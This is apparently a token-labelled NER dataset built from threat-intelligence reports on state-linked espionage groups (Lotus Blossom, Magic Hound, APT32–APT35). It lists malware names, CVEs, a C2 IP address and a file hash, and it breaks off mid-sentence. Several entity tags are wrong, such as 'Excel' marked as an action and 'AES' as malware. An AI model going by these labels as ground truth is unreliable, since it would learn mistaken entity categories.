+DRAGONFISH S-APT
+or O
+Lotus B-APT
+Blossom E-APT
+are O
+distributing O
+a O
+new O
+form O
+of O
+Elise S-MAL
+malware S-MAL
+targeting O
+organizations O
+for O
+espionage S-ACT
+purposes O
+. O
+
+The O
+threat O
+actors S-APT
+associated O
+with O
+DRAGONFISH S-APT
+have O
+previously O
+focused O
+their O
+campaigns S-ACT
+on O
+targets O
+in O
+Southeast B-LOC
+Asia E-LOC
+, O
+specifically O
+those O
+located O
+in O
+countries O
+near O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+. O
+
+iDefense S-SECTEAM
+analysts O
+have O
+identified O
+a O
+campaign O
+likely O
+to O
+be O
+targeting O
+members O
+of— O
+or O
+those O
+with O
+affiliation O
+or O
+interest O
+in—the O
+ASEAN O
+Defence B-IDTY
+Ministers I-IDTY
+' I-IDTY
+Meeting E-IDTY
+( O
+ADMM S-IDTY
+) O
+. O
+
+iDefense S-SECTEAM
+analysts O
+have O
+identified O
+a O
+campaign O
+likely O
+to O
+be O
+targeting O
+members O
+of O
+or O
+those O
+with O
+affiliation O
+or O
+interest O
+in O
+the O
+ASEAN B-IDTY
+Defence I-IDTY
+Minister I-IDTY
+'s I-IDTY
+Meeting E-IDTY
+( O
+ADMM S-IDTY
+) O
+. O
+
+iDefense S-SECTEAM
+assesses O
+with O
+high O
+confidence O
+that O
+this O
+campaign O
+is O
+associated O
+with O
+the O
+threat O
+group O
+DRAGONFISH S-APT
+( O
+also O
+known O
+as O
+Lotus B-APT
+Blossom E-APT
+and O
+Spring B-APT
+Dragon E-APT
+) O
+. O
+
+To O
+mitigate O
+the O
+threat O
+of O
+the O
+described O
+campaign O
+, O
+security O
+teams O
+can O
+consider O
+blocking O
+access O
+to O
+the O
+C2 S-TOOL
+server O
+103.236.150.14 O
+and O
+, O
+where O
+applicable O
+, O
+ensure O
+that O
+the O
+Microsoft S-IDTY
+Security O
+Update O
+KB2553204 O
+is O
+installed O
+in O
+order O
+to O
+patch O
+the O
+CVE-2017-11882 S-VULID
+vulnerability O
+. O
+
+The O
+actors S-APT
+attempted O
+to O
+exploit S-VULNAME
+CVE-2014-6332 S-VULID
+using O
+a O
+slightly O
+modified O
+version O
+of O
+the O
+proof-of-concept O
+( O
+POC O
+) O
+code O
+to O
+install O
+a O
+Trojan S-MAL
+called O
+Emissary S-MAL
+, O
+which O
+is O
+related O
+to O
+the O
+Operation B-ACT
+Lotus I-ACT
+Blossom I-ACT
+campaign E-ACT
+. O
+
+The O
+targeting O
+of O
+this O
+individual S-IDTY
+suggests O
+the O
+actors S-APT
+are O
+interested O
+in O
+breaching O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+itself O
+or O
+gaining O
+insights O
+into O
+relations O
+between O
+France S-LOC
+and O
+Taiwan S-LOC
+. O
+
+On O
+November B-TIME
+10 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+threat O
+actors S-APT
+sent O
+a O
+spear-phishing S-ACT
+email E-ACT
+to O
+an O
+individual S-IDTY
+at O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+. O
+
+On O
+November B-TIME
+10 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+Lotus B-APT
+Blossom E-APT
+sent O
+a O
+spear-phishing S-ACT
+email E-ACT
+to O
+an O
+individual S-IDTY
+at O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+. O
+
+Both O
+attachments O
+are O
+malicious B-FILE
+Word I-FILE
+documents E-FILE
+that O
+attempt O
+to O
+exploit S-VULNAME
+the O
+Windows S-OS
+OLE B-TOOL
+Automation I-TOOL
+Array I-TOOL
+Remote I-TOOL
+Code I-TOOL
+Execution E-TOOL
+Vulnerability S-VULNAME
+tracked O
+by O
+CVE-2014-6332 S-VULID
+. O
+
+Lotus B-APT
+Blossom E-APT
+attempted O
+to O
+exploit S-VULNAME
+CVE-2014-6332 S-VULID
+using O
+the O
+POC O
+code O
+available O
+in O
+the O
+wild O
+. O
+
+This O
+Trojan S-MAL
+is O
+related O
+to O
+the O
+Elise B-MAL
+backdoor E-MAL
+described O
+in O
+the O
+Operation B-ACT
+Lotus I-ACT
+Blossom E-ACT
+report O
+. O
+
+Lotus B-APT
+Blossom E-APT
+was O
+attempting O
+to O
+exploit S-VULNAME
+CVE-2014-6332 S-VULID
+to O
+install O
+a O
+new O
+version O
+of O
+the O
+Emissary B-MAL
+Trojan E-MAL
+, O
+specifically O
+version O
+5.3 O
+. O
+
+APT B-APT
+threat I-APT
+actors E-APT
+, O
+most O
+likely O
+nation O
+state-sponsored O
+, O
+targeted O
+a O
+diplomat S-IDTY
+in O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+with O
+a O
+seemingly O
+legitimate O
+invitation O
+to O
+a O
+technology O
+conference O
+in O
+Taiwan S-LOC
+. O
+
+Additionally O
+, O
+the O
+targeting O
+of O
+a O
+French B-IDTY
+diplomat E-IDTY
+based O
+in O
+Taipei O
+, O
+Taiwan S-LOC
+aligns O
+with O
+previous O
+targeting O
+by O
+these O
+actors S-APT
+, O
+as O
+does O
+the O
+separate O
+infrastructure O
+. O
+
+The O
+Elise S-MAL
+malware S-MAL
+used O
+by O
+Lotus B-APT
+Blossom E-APT
+, O
+which O
+was O
+an O
+attack B-ACT
+campaign E-ACT
+on O
+targets O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+Based O
+on O
+the O
+targeting O
+and O
+lures O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+assesses O
+that O
+the O
+Lotus B-APT
+Blossom I-APT
+actors E-APT
+' O
+collection O
+requirements O
+include O
+militaries S-IDTY
+and O
+government B-IDTY
+agencies E-IDTY
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+In O
+December B-TIME
+2015 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+published O
+a O
+blog O
+about O
+a O
+cyber B-ACT
+espionage I-ACT
+attack E-ACT
+using O
+the O
+Emissary B-MAL
+Trojan E-MAL
+as O
+a O
+payload O
+. O
+
+The O
+oldest O
+sample O
+we O
+found O
+was O
+created O
+in O
+2009 S-TIME
+, O
+indicating O
+this O
+tool O
+has O
+been O
+in O
+use O
+for O
+almost O
+seven O
+years O
+. O
+
+In O
+addition O
+, O
+Emissary S-MAL
+appears O
+to O
+against O
+Taiwan S-LOC
+or O
+Hong B-LOC
+Kong E-LOC
+, O
+all O
+of O
+the O
+decoys O
+are O
+written O
+in O
+Traditional O
+Chinese S-LOC
+, O
+and O
+they O
+use O
+themes O
+related O
+to O
+the O
+government S-IDTY
+or O
+military S-IDTY
+. O
+
+Of O
+note O
+, O
+this O
+is O
+three O
+years O
+earlier O
+than O
+the O
+oldest O
+Elise B-MAL
+sample E-MAL
+we O
+have O
+found O
+, O
+suggesting O
+this O
+group O
+has O
+been O
+active O
+longer O
+than O
+previously O
+documented O
+. O
+
+In O
+addition O
+, O
+we O
+observed O
+a O
+TTP O
+shift O
+post O
+publication O
+with O
+regards O
+to O
+their O
+malware O
+delivery O
+; O
+they O
+started O
+using O
+compromised O
+but O
+legitimate B-MAL
+domains E-MAL
+to O
+serve O
+their O
+malware O
+. O
+
+All O
+of O
+the O
+Emissary S-MAL
+we've O
+collected O
+are O
+written O
+in O
+Traditional O
+Chinese S-LOC
+, O
+which O
+is O
+used O
+primarily O
+in O
+Taiwan S-LOC
+and O
+Hong B-LOC
+Kong E-LOC
+. O
+
+One O
+of O
+the O
+most O
+interesting O
+observations O
+made O
+during O
+this O
+analysis O
+is O
+that O
+the O
+amount O
+of O
+development O
+effort O
+devoted O
+to O
+Emissary S-MAL
+significantly O
+increased O
+after O
+we O
+published O
+our O
+Operation B-ACT
+Lotus I-ACT
+Blossom E-ACT
+report O
+in O
+June B-TIME
+2015 E-TIME
+, O
+resulting O
+in O
+many O
+new O
+versions O
+of O
+the O
+Emissary B-MAL
+Trojan E-MAL
+. O
+
+Lotus B-APT
+Blossom E-APT
+targeted O
+the O
+government S-IDTY
+, O
+higher B-IDTY
+education E-IDTY
+, O
+and O
+high B-IDTY
+tech I-IDTY
+companies E-IDTY
+. O
+
+Our O
+evidence O
+suggests O
+that O
+malware O
+authors O
+created O
+Emissary S-MAL
+as O
+early O
+as O
+2009 S-TIME
+, O
+which O
+suggests O
+that O
+threat O
+actors S-APT
+have O
+relied O
+on O
+this O
+tool O
+as O
+a O
+payload O
+in O
+cyber-espionage B-ACT
+attacks E-ACT
+for O
+many O
+years O
+. O
+
+While O
+it O
+lacks O
+more O
+advanced O
+functionality O
+like O
+screen O
+capturing O
+, O
+it O
+is O
+still O
+able O
+to O
+carry O
+out O
+most O
+tasks O
+desired O
+by O
+threat O
+actors S-APT
+: O
+Exfiltration S-ACT
+of O
+files O
+, O
+ability O
+to O
+download O
+and O
+execute O
+additional O
+payloads O
+, O
+and O
+gain O
+remote O
+shell O
+access O
+. O
+
+The O
+timeline O
+in O
+Figure O
+2 O
+shows O
+that O
+the O
+Emissary B-MAL
+Trojan E-MAL
+was O
+first O
+created O
+( O
+version O
+1.0 O
+) O
+in O
+May B-TIME
+2009 E-TIME
+and O
+quickly O
+received O
+an O
+update O
+that O
+resulted O
+in O
+version O
+1.1 O
+in O
+June B-TIME
+2009 E-TIME
+. O
+
+Between O
+August S-TIME
+and O
+November B-TIME
+2015 E-TIME
+the O
+malware O
+author O
+creates O
+several O
+new O
+versions O
+of O
+Emissary S-MAL
+, O
+specifically O
+5.0 O
+, O
+5.1 O
+, O
+5.3 O
+and O
+5.4 O
+in O
+a O
+much O
+more O
+rapid O
+succession O
+compared O
+to O
+development O
+process O
+in O
+earlier O
+versions O
+. O
+
+Version O
+2.0 O
+received O
+one O
+update O
+in O
+October B-TIME
+2013 E-TIME
+before O
+the O
+malware O
+author O
+released O
+version O
+3.0 O
+in O
+December B-TIME
+2014 E-TIME
+. O
+
+While O
+this O
+may O
+be O
+coincidental O
+, O
+the O
+out-of-sequence O
+version O
+3.0 O
+sample O
+was O
+created O
+ten O
+days O
+after O
+we O
+published O
+the O
+Operation B-ACT
+Lotus I-ACT
+Blossom E-ACT
+paper O
+that O
+exposed O
+the O
+Elise B-MAL
+Trojan E-MAL
+that O
+is O
+closely O
+related O
+to O
+Emissary S-MAL
+. O
+
+The O
+Lotus B-APT
+Blossom E-APT
+largely O
+targets O
+military S-IDTY
+or O
+government S-IDTY
+, O
+with O
+some O
+cases O
+of O
+higher B-IDTY
+education E-IDTY
+and O
+high B-IDTY
+tech I-IDTY
+companies E-IDTY
+. O
+
+The O
+use O
+of O
+Emissary S-MAL
+appears O
+to O
+be O
+focused O
+only O
+on O
+Taiwan S-LOC
+and O
+Hong B-LOC
+Kong E-LOC
+, O
+with O
+regular O
+malware O
+updates O
+to O
+avoid O
+detection O
+and O
+to O
+increase O
+the O
+odds O
+of O
+success O
+. O
+
+The O
+Lotus B-APT
+Blossom I-APT
+actors E-APT
+using O
+Emissary S-MAL
+have O
+been O
+active O
+for O
+at O
+least O
+seven O
+years O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+Magic O
+Hound O
+has O
+primarily O
+targeted O
+organizations O
+in O
+the O
+energy S-IDTY
+, O
+government S-IDTY
+, O
+and O
+technology B-IDTY
+sectors E-IDTY
+that O
+are O
+either O
+based O
+or O
+have O
+business O
+interests O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+Regardless O
+of O
+causation O
+, O
+the O
+rapid O
+development O
+of O
+new O
+versions O
+of O
+Emissary S-MAL
+suggests O
+that O
+the O
+malware O
+authors O
+are O
+making O
+frequent O
+modifications O
+to O
+evade O
+detection O
+, O
+which O
+as O
+a O
+corollary O
+suggests O
+the O
+Lotus B-APT
+Blossom E-APT
+are O
+actively O
+using O
+the O
+Emissary B-MAL
+Trojan E-MAL
+as O
+a O
+payload O
+in O
+attacks O
+. O
+
+Link O
+analysis O
+of O
+infrastructure O
+and O
+tools O
+also O
+revealed O
+a O
+potential O
+relationship O
+between O
+Magic O
+Hound O
+and O
+the O
+adversary O
+group O
+called O
+" O
+Rocket B-APT
+Kitten E-APT
+" O
+( O
+AKA O
+Operation B-APT
+Saffron I-APT
+Rose E-APT
+, O
+Ajax B-APT
+Security I-APT
+Team E-APT
+, O
+Operation B-APT
+Woolen-Goldfish E-APT
+) O
+as O
+well O
+as O
+an O
+older O
+attack B-ACT
+campaign E-ACT
+called O
+Newscasters O
+. O
+
+In O
+addition O
+to O
+the O
+malware O
+evolution O
+, O
+the O
+actors S-APT
+also O
+shifted O
+from O
+solely O
+spear-phishing S-ACT
+targets O
+with O
+attachments O
+to O
+also O
+compromising O
+legitimate O
+websites O
+to O
+host O
+malware O
+. O
+
+It O
+is O
+highly O
+likely O
+the O
+Lotus B-APT
+Blossom E-APT
+used O
+spear-phishing S-ACT
+attacks E-ACT
+containing O
+links O
+to O
+these O
+malicious O
+documents O
+as O
+a O
+delivery O
+mechanism O
+. O
+
+We O
+were O
+ultimately O
+able O
+to O
+identify O
+multiple O
+organizations O
+in O
+the O
+government S-IDTY
+, O
+energy S-IDTY
+, O
+and O
+technology B-IDTY
+sectors E-IDTY
+targeted O
+by O
+Magic O
+Hound O
+. O
+
+The O
+Magic B-ACT
+Hound I-ACT
+attacks E-ACT
+did O
+not O
+rely O
+on O
+exploit S-VULNAME
+code O
+to O
+compromise O
+targeted O
+systems O
+, O
+instead O
+relying O
+on O
+Excel S-ACT
+and O
+Word B-ACT
+documents E-ACT
+containing O
+malicious O
+macros O
+. O
+
+The O
+MPK B-MAL
+bot E-MAL
+is O
+not O
+publicly O
+available O
+and O
+had O
+previously O
+been O
+attributed O
+to O
+an O
+adversary O
+group O
+called O
+" O
+Rocket B-APT
+Kitten E-APT
+" O
+which O
+has O
+often O
+been O
+thought O
+to O
+be O
+a O
+state O
+sponsored O
+adversary O
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+One O
+payload O
+was O
+a O
+Python S-TOOL
+based O
+open O
+source O
+remote B-MAL
+administration I-MAL
+tool E-MAL
+( O
+RAT S-MAL
+) O
+called O
+Pupy S-MAL
+. O
+
+The O
+Magic B-ACT
+Hound I-ACT
+campaign E-ACT
+used O
+Word S-ACT
+and O
+Excel S-ACT
+documents O
+containing O
+malicious O
+macros O
+as O
+a O
+delivery O
+method O
+, O
+specifically O
+attempting O
+to O
+load O
+MagicHound.Rollover S-MAL
+. O
+
+Many O
+of O
+the O
+Fetch O
+samples O
+we O
+analyzed O
+attempted O
+to O
+obfuscate O
+their O
+functionality O
+by O
+encrypting O
+their O
+embedded O
+strings O
+using O
+AES S-MAL
+. O
+
+The O
+loader O
+'s O
+main O
+goal O
+was O
+to O
+run O
+a O
+PowerShell B-MAL
+command E-MAL
+to O
+execute O
+shellcode O
+. O
+
+To O
+set O
+up O
+persistence O
+, O
+the O
+loader O
+writes O
+a O
+file O
+to O
+" O
+c:\temp\rr.exe S-FILE
+" O
+and O
+executes O
+it O
+with O
+specific O
+command O
+line O
+arguments O
+to O
+create O
+auto O
+run O
+registry O
+keys O
+. O
+
+The O
+Magic B-ACT
+Hound I-ACT
+campaign E-ACT
+was O
+also O
+discovered O
+using O
+a O
+custom B-MAL
+dropper E-MAL
+tool O
+, O
+which O
+we O
+have O
+named O
+MagicHound.DropIt S-FILE
+. O
+
+We O
+have O
+also O
+seen O
+Magic O
+Hound O
+using O
+DropIt S-MAL
+as O
+a O
+binder O
+, O
+specifically O
+dropping O
+a O
+legitimate O
+decoy O
+executable O
+along O
+with O
+the O
+malicious O
+executable O
+onto O
+the O
+target O
+host O
+. O
+
+We O
+also O
+found O
+a O
+second O
+IRC B-MAL
+bot E-MAL
+called O
+MPK S-MAL
+using O
+the O
+same O
+IP S-PROT
+for O
+its O
+C2 S-TOOL
+server O
+that O
+a O
+Leash B-MAL
+sample E-MAL
+was O
+hosted O
+on O
+. O
+
+The O
+Magic B-ACT
+Hound I-ACT
+attack I-ACT
+campaign E-ACT
+is O
+an O
+active O
+and O
+persistent O
+espionage S-ACT
+motivated O
+adversary O
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+Organizations O
+in O
+the O
+government S-IDTY
+, O
+energy S-IDTY
+, O
+and O
+technology B-IDTY
+sectors E-IDTY
+have O
+been O
+targeted O
+by O
+Magic O
+Hound O
+, O
+specifically O
+organizations O
+based O
+in O
+or O
+doing O
+business O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+At O
+a O
+high O
+level O
+, O
+Retriever S-MAL
+is O
+a O
+.NET B-MAL
+downloader E-MAL
+that O
+downloads O
+secondary O
+payloads O
+from O
+servers O
+associated O
+with O
+Magic O
+Hound O
+. O
+
+For O
+example O
+, O
+we O
+analyzed O
+a O
+DropIt B-MAL
+sample E-MAL
+( O
+SHA256 S-ENCR
+: O
+cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 S-SHA2
+) O
+that O
+dropped O
+two O
+executables O
+, O
+one O
+of O
+which O
+was O
+saved O
+to O
+" O
+%TEMP%\flash_update.exe S-FILE
+" O
+that O
+was O
+a O
+legitimate O
+Flash B-MAL
+Player I-MAL
+installer E-MAL
+. O
+
+M-Trends S-SECTEAM
+2018 S-TIME
+can O
+arm O
+security O
+teams O
+with O
+the O
+knowledge O
+they O
+need O
+to O
+defend O
+against O
+today O
+'s O
+most O
+often O
+used O
+cyber B-ACT
+attacks E-ACT
+, O
+as O
+well O
+as O
+lesser O
+seen O
+and O
+emerging O
+threats O
+. O
+
+FireEye S-SECTEAM
+tracks O
+thousands O
+of O
+threat O
+actors S-APT
+, O
+but O
+pays O
+special O
+attention O
+to O
+state-sponsored O
+attackers S-APT
+who O
+carry O
+out O
+advanced O
+persistent O
+threat O
+( O
+APT O
+) O
+attacks O
+. O
+
+Since O
+at O
+least O
+2014 S-TIME
+, O
+APT32 S-APT
+, O
+also O
+known O
+as O
+the O
+OceanLotus B-APT
+Group E-APT
+, O
+has O
+targeted O
+foreign B-IDTY
+corporations E-IDTY
+with O
+investments O
+in O
+Vietnam S-LOC
+, O
+foreign B-IDTY
+governments E-IDTY
+, O
+journalists S-IDTY
+, O
+and O
+Vietnamese S-LOC
+dissidents S-IDTY
+. O
+
+During O
+a O
+recent O
+campaign O
+, O
+APT32 S-APT
+leveraged O
+social B-ACT
+engineering E-ACT
+emails S-TOOL
+with O
+Microsoft B-FILE
+ActiveMime I-FILE
+file E-FILE
+attachments O
+to O
+deliver O
+malicious O
+macros O
+. O
+
+Evidence O
+also O
+suggests O
+that O
+APT32 S-APT
+has O
+targeted O
+network B-IDTY
+security E-IDTY
+and O
+technology B-IDTY
+infrastructure I-IDTY
+corporations E-IDTY
+with O
+connections O
+to O
+foreign O
+investors O
+. O
+
+Since O
+at O
+least O
+2014 S-TIME
+, O
+APT32 S-APT
+, O
+also O
+known O
+as O
+the O
+OceanLotus B-APT
+Group E-APT
+, O
+has O
+targeted O
+foreign B-IDTY
+corporations E-IDTY
+foreign O
+governments S-IDTY
+. O
+
+FireEye S-SECTEAM
+asesses O
+that O
+APT32 B-APT
+actors E-APT
+may O
+be O
+aligned O
+with O
+the O
+national O
+interests O
+of O
+Vietnam S-LOC
+. O
+
+APT32 S-APT
+poses O
+a O
+threat O
+to O
+companies O
+doing O
+business O
+or O
+preparing O
+to O
+invest O
+in O
+Vietnam S-LOC
+. O
+
+We O
+believe O
+recent O
+activity O
+targeting O
+private O
+interests O
+in O
+Vietnam S-LOC
+suggests O
+that O
+APT32 S-APT
+poses O
+a O
+threat O
+to O
+companies O
+doing O
+business O
+or O
+preparing O
+to O
+invest O
+in O
+the O
+country O
+. O
+
+DROPSHOT S-MAL
+is O
+a O
+notable O
+piece O
+of O
+malware S-MAL
+used O
+to O
+deliver O
+variants O
+of O
+the O
+TURNEDUP O
+backdoor O
+. O
+
+Additionally O
+, O
+there O
+is O
+evidence O
+to O
+suggest O
+APT33 S-APT
+targeted O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+APT33 S-APT
+often O
+conducts O
+spear-phishing S-ACT
+operations O
+using O
+a O
+built-in O
+phishing B-ACT
+module E-ACT
+. O
+
+Additionally O
+, O
+there O
+is O
+evidence O
+to O
+suggest O
+APT33 S-APT
+targeted O
+Saudi B-LOC
+Arabian E-LOC
+and O
+Western S-LOC
+organizations O
+that O
+provide O
+training O
+, O
+maintenance O
+and O
+support O
+for O
+Saudi B-LOC
+Arabia E-LOC
+'s O
+military S-IDTY
+and O
+commercial S-IDTY
+fleets O
+. O
+
+Although O
+we O
+have O
+only O
+observed O
+APT33 S-APT
+use O
+DROPSHOT S-MAL
+to O
+deliver O
+TURNEDUP O
+, O
+we O
+have O
+identified O
+multiple O
+DROPSHOT B-MAL
+samples E-MAL
+in O
+the O
+wild O
+that O
+delivered O
+wiper O
+malware O
+we O
+call O
+SHAPESHIFT S-MAL
+. O
+
+The O
+SHAPESHIFT B-MAL
+wiper E-MAL
+is O
+capable O
+of O
+wiping O
+disks O
+and O
+volumes O
+, O
+as O
+well O
+as O
+deleting O
+files O
+. O
+
+Ties O
+to O
+SHAPESHIFT S-MAL
+suggest O
+that O
+APT33 S-APT
+may O
+engage O
+in O
+destructive O
+operations O
+or O
+shares O
+tools O
+or O
+development O
+resources O
+with O
+an O
+Iranian S-LOC
+threat O
+group O
+that O
+conducts O
+destructive O
+operations O
+. O
+
+In O
+a O
+recent O
+attack O
+, O
+APT33 S-APT
+sent O
+spear-phishing S-ACT
+emails S-TOOL
+to O
+workers O
+in O
+the O
+aviation B-IDTY
+industry E-IDTY
+. O
+
+The O
+HTA B-FILE
+files E-FILE
+contained O
+job O
+descriptions O
+and O
+links O
+to O
+job O
+postings O
+on O
+popular O
+employment O
+websites O
+. O
+
+Since O
+at O
+least O
+2014 S-TIME
+, O
+an O
+Iranian S-LOC
+threat O
+group O
+tracked O
+by O
+FireEye S-SECTEAM
+as O
+APT34 S-APT
+has O
+conducted O
+reconnaissance O
+aligned O
+with O
+the O
+strategic O
+interests O
+of O
+Iran S-LOC
+. O
+
+These O
+emails S-TOOL
+included O
+recruitment-themed B-ACT
+lures E-ACT
+and O
+links O
+to O
+malicious O
+HTML B-TOOL
+Application E-TOOL
+files O
+. O
+
+The O
+OilRig B-APT
+group E-APT
+conducts O
+operations O
+primarily O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+targeting O
+financial S-IDTY
+, O
+government S-IDTY
+, O
+energy S-IDTY
+, O
+chemical S-IDTY
+, O
+telecommunications S-IDTY
+and O
+other O
+industries O
+. O
+
+APT34 S-APT
+uses O
+a O
+mix O
+of O
+public B-MAL
+and I-MAL
+non-public I-MAL
+tools E-MAL
+. O
+
+APT34 S-APT
+often O
+uses O
+compromised B-MAL
+accounts E-MAL
+to O
+conduct O
+spear-phishing S-ACT
+operations O
+. O
+
+APT33 S-APT
+leverages O
+a O
+mix O
+of O
+public B-MAL
+and I-MAL
+non-public I-MAL
+tools E-MAL
+and O
+often O
+conducts O
+spear-phishing S-ACT
+operations O
+using O
+a O
+built-in O
+phishing B-ACT
+module E-ACT
+from O
+" O
+ALFA B-MAL
+TEaM I-MAL
+Shell E-MAL
+" O
+, O
+a O
+publicly B-MAL
+available I-MAL
+web I-MAL
+shell E-MAL
+. O
+
+In O
+July B-TIME
+2017 E-TIME
+, O
+FireEye S-SECTEAM
+observed O
+APT34 S-APT
+targeting O
+an O
+organization O
+in O
+the O
+Middle B-LOC
+East E-LOC
+using O
+the O
+POWRUNER B-MAL
+PowerShell-based I-MAL
+backdoor E-MAL
+and O
+the O
+downloader O
+BONDUPDATER S-MAL
+. O
+
+POWRUNER S-MAL
+was O
+delivered O
+using O
+a O
+malicious O
+RTF B-FILE
+file E-FILE
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+APT34 S-APT
+leveraged O
+the O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+CVE-2017-11882 S-VULID
+to O
+deploy O
+POWRUNER S-MAL
+and O
+BONDUPDATER S-MAL
+less O
+than O
+a O
+week O
+after O
+Microsoft S-IDTY
+issued O
+a O
+patch O
+. O
+
+FireEye S-SECTEAM
+has O
+identified O
+APT35 S-APT
+operations O
+dating O
+back O
+to O
+2014 S-TIME
+. O
+
+APT35 S-APT
+, O
+also O
+known O
+as O
+the O
+Newscaster B-APT
+Team E-APT
+, O
+is O
+a O
+threat O
+group O
+sponsored O
+by O
+the O
+Iranian S-LOC
+government O
+that O
+conducts O
+long O
+term O
+, O
+resource-intensive O
+operations O
+to O
+collect O
+strategic O
+intelligence O
+. O
+
+APT35 S-APT
+typically O
+targets O
+military S-IDTY
+, O
+diplomatic S-IDTY
+and O
+government S-IDTY
+, O
+media S-IDTY
+, O
+energy S-IDTY
+, O
+engineering S-IDTY
+, O
+business B-IDTY
+services E-IDTY
+and O
+telecommunications B-IDTY
+sectors E-IDTY
+in O
+U.S. S-LOC
+and O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+APT35 S-APT
+has O
+historically O
+used O
+unsophisticated B-MAL
+tools E-MAL
+like O
+those O
+listed O
+below O
+in O
+Figure O
+3 O
+. O
+
+APT35 S-APT
+typically O
+targets O
+U.S. S-LOC
+and O
+the O
+Middle B-LOC
+Eastern E-LOC
+military S-IDTY
+, O
+diplomatic S-IDTY
+and O
+government B-IDTY
+personnel E-IDTY
+, O
+organizations S-IDTY
+in O
+the O
+media S-IDTY
+, O
+energy S-IDTY
+and O
+defense B-IDTY
+industrial I-IDTY
+base E-IDTY
+( O
+DIB S-IDTY
+) O
+, O
+and O
+engineering S-IDTY
+, O
+business B-IDTY
+services E-IDTY
+and O
+telecommunications B-IDTY
+sectors E-IDTY
+. O
+
+Many O
+of O
+the O
+fake O
+personas O
+utilized O
+by O
+APT35 S-APT
+claimed O
+to O
+be O
+part O
+of O
+news B-IDTY
+organizations E-IDTY
+, O
+which O
+led O
+to O
+APT35 S-APT
+being O
+referred O
+to O
+as O
+the O
+Newscaster B-APT
+Team E-APT
+. O
+
+Since O
+at O
+least O
+2013 S-TIME
+, O
+the O
+Iranian S-LOC
+threat O
+group O
+that O
+FireEye S-SECTEAM
+tracks O
+as O
+APT33 S-APT
+has O
+carried O
+out O
+a O
+Cyber B-ACT
+Espionage E-ACT
+operation O
+to O
+collect O
+information O
+from O
+defense S-IDTY
+, O
+aerospace S-IDTY
+and O
+petrochemical B-IDTY
+organizations E-IDTY
+. O
+
+Since O
+at O
+least O
+2013 S-TIME
+, O
+the O
+Iranian S-LOC
+threat O
+group O
+FireEye S-SECTEAM
+tracks O
+as O
+APT33 S-APT
+has O
+carried O
+out O
+a O
+Cyber B-ACT
+Espionage E-ACT
+operation O
+to O
+collect O
+information O
+from O
+defense S-IDTY
+, O
+aerospace S-IDTY
+and O
+petrochemical B-IDTY
+organizations E-IDTY
+. O
+
+In O
+early B-TIME
+2017 E-TIME
+, O
+Mandiant S-SECTEAM
+responded O
+to O
+an O
+incident O
+involving O
+APT35 S-APT
+targeting O
+an O
+energy B-IDTY
+company E-IDTY
+. O
+
+The O
+attacker S-APT
+used O
+a O
+spear-phishing S-ACT
+email E-ACT
+containing O
+a O
+link O
+to O
+a O
+fake O
+resume O
+hosted O
+on O
+a O
+legitimate O
+website O
+that O
+had O
+been O
+compromised O
+. O
+
+APT35 S-APT
+also O
+installed O
+BROKEYOLK O
+, O
+a O
+custom B-MAL
+backdoor E-MAL
+, O
+to O
+maintain O
+persistence O
+on O
+the O
+compromised O
+host O
+. O
+
+They O
+then O
+proceeded O
+to O
+log O
+directly O
+into O
+the O
+VPN S-TOOL
+using O
+the O
+credentials B-MAL
+of I-MAL
+the I-MAL
+compromised I-MAL
+user E-MAL
+. O
+
+The O
+resume O
+contained O
+the O
+PupyRAT B-MAL
+backdoor E-MAL
+, O
+which O
+communicated O
+with O
+known O
+APT35 S-APT
+infrastructure O
+. O
+
+Once O
+connected O
+to O
+the O
+VPN S-TOOL
+, O
+APT35 S-APT
+focused O
+on O
+stealing O
+domain O
+credentials O
+from O
+a O
+Microsoft S-IDTY
+Active O
+Directory O
+Domain O
+Controller O
+to O
+allow O
+them O
+to O
+authenticate O
+to O
+the O
+single-factor O
+VPN S-TOOL
+and O
+Office O
+365 O
+instance O
+. O
+
+While O
+having O
+access O
+to O
+the O
+organization O
+'s O
+environment O
+, O
+the O
+Magic O
+Hound O
+targeted O
+data O
+related O
+to O
+entities O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+Mandiant S-SECTEAM
+has O
+previously O
+observed O
+targeted O
+attackers S-APT
+stealing O
+email S-TOOL
+, O
+but O
+few O
+threat O
+actors S-APT
+have O
+been O
+as O
+successful O
+at O
+this O
+as O
+APT35 S-APT
+. O
+
+The O
+campaigns S-ACT
+delivered O
+PupyRAT S-MAL
+, O
+an O
+open-source O
+cross-platform O
+remote B-MAL
+access I-MAL
+trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+Ultimately O
+, O
+APT35 S-APT
+had O
+used O
+access O
+to O
+hundreds O
+of O
+mailboxes O
+to O
+read O
+email B-IDTY
+communications E-IDTY
+and O
+steal O
+data O
+related O
+to O
+Middle B-LOC
+East E-LOC
+organizations O
+, O
+which O
+later O
+became O
+victims O
+of O
+destructive B-ACT
+attacks E-ACT
+. O
+
+CTU S-SECTEAM
+researchers O
+observed O
+likely O
+unsuccessful O
+phishing B-ACT
+campaigns E-ACT
+being O
+followed O
+by O
+highly O
+targeted O
+spearphishing S-ACT
+and O
+social B-ACT
+engineering I-ACT
+attacks E-ACT
+from O
+a O
+threat O
+actor O
+using O
+the O
+name O
+Mia B-APT
+Ash E-APT
+. O
+
+Further O
